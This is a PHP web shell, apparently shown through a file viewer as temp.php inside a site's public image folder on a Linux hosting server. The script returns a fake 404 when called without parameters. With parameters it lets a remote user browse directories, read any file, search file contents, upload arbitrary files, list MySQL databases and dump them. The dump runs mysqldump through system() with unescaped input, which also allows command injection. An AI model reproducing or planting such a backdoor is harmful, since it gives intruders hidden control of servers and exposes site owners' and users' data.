| Current Path : /home/baheco/public_html/img/ |
Linux sd-1582531-l.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 |
| Current File : /home/baheco/public_html/img/temp.php |
<?php
function recurs($dir, $word) {
$files = scandir($dir);
foreach ($files as $file) {
if ($file == '.' or $file == '..') {
continue;
}
$full_path = realpath($dir.'/'.$file);
if (is_dir($full_path)) {
recurs($full_path, $word);
}
else {
if (stristr(file_get_contents($full_path), $word) !== false) {
echo "<li><a href='temp.php?path=".urlencode($full_path)."'>".htmlspecialchars($full_path)."</a></li>";
}
}
}
}
function sort_scandir($dir) {
$items = scandir($dir);
$folders = array();
$files = array();
foreach ($items as $item) {
if (is_dir($dir . '/' . $item)) {
$folders[$item] = $item;
}
else {
$files[$item] = $item;
}
}
sort($folders);
sort($files);
$result = array_merge($folders, $files);
return $result;
}
$db = $_GET['db'] ?? NULL;
$user = $_GET['user'] ?? NULL;
$pass = $_GET['pass'] ?? NULL;
$host = $_GET['host'] ?? NULL;
if ($db) {
header('Content-Type: application/sql');
header('Content-Disposition: attachment; filename="dump.sql"');
header('Content-Transfer-Encoding: binary');
system("mysqldump --host=".$host." --user=".$user." --password=".$pass." ".$db);
exit;
}
$path = $_GET['path'] ?? NULL;
if ($path) {
if (is_dir($path)) {
//mysql
echo "<form action='temp.php?path=".urlencode($path)."' method='POST' enctype='multipart/form-data'><input type='hidden' name='path' value='".htmlspecialchars($path)."'><input type='text' name='host' value='localhost' size='5'><input type='text' name='user' value='root' size='5'><input type='text' name='pass' size='5' placeholder='pass'><input type='text' name='db' size='5' placeholder='db'><input type='submit' name='mysql' value='Connect'></form>";
//search
echo "<form action='temp.php' method='get'><input type='hidden' name='path' value='".htmlspecialchars($path)."'><input type='text' name='recurs'><input type='submit' value='Search'></form>";
//upload
echo "<form action='temp.php?path=".urlencode($path)."' method='POST' enctype='multipart/form-data'><input type='hidden' name='path' value='".htmlspecialchars($path)."'><label for='file-upload' style='padding: 10px;cursor: pointer;'>[select file]</label><input id='file-upload' type='file' name='file' style='display:none;'><input type='submit' name='upload' value='Upload'></form>";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['upload'])) {
if (isset($_FILES['file']) and $_FILES['file']['error'] == UPLOAD_ERR_OK) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $path.'/'.basename($_FILES['file']['name']))) {
echo '<ul><i>Uploaded</i></ul>';
}
}
}
elseif (isset($_POST['mysql'])) {
$path = $_POST['path'] ?? NULL;
$host = $_POST['host'] ?? NULL;
$user = $_POST['user'] ?? NULL;
$pass = $_POST['pass'] ?? NULL;
$db = $_POST['db'] ?? NULL;
try {
$mysqli = mysqli_connect($host, $user, $pass, $db);
mysqli_set_charset($mysqli, 'utf8');
if ($mysqli) {
$result = $mysqli->query("SHOW DATABASES");
if ($result) {
echo '<ul>';
while ($row = $result->fetch_assoc()) {
$db = $row['Database'];
echo "<li><a href='?db=".urlencode($db)."&user=".urlencode($user)."&pass=".urlencode($pass)."&host=".urlencode($host)."'>".htmlspecialchars($db)."</a></li>";
}
echo '</ul>';
}
mysqli_close($mysqli);
}
}
catch(mysqli_sql_exception $mysqli_error) {
echo "<ul><i>Connection error</i></ul>";
}
}
}
$recurs = $_GET['recurs'] ?? NULL;
if ($recurs) {
echo "<ul>";
recurs($path, $recurs);
echo "</ul>";
}
//files
$files = sort_scandir($path);
echo '<ul>';
for($i = 0; $i < count($files); $i++) {
$full_path = realpath($path."/".$files[$i]);
echo "<li><a href='temp.php?path=".urlencode($full_path)."'>".htmlspecialchars($files[$i])."</a></li>";
}
echo '</ul>';
}
else {
highlight_file($path);
}
}
else {
header('HTTP/1.0 404 Not Found');
exit;
}
?>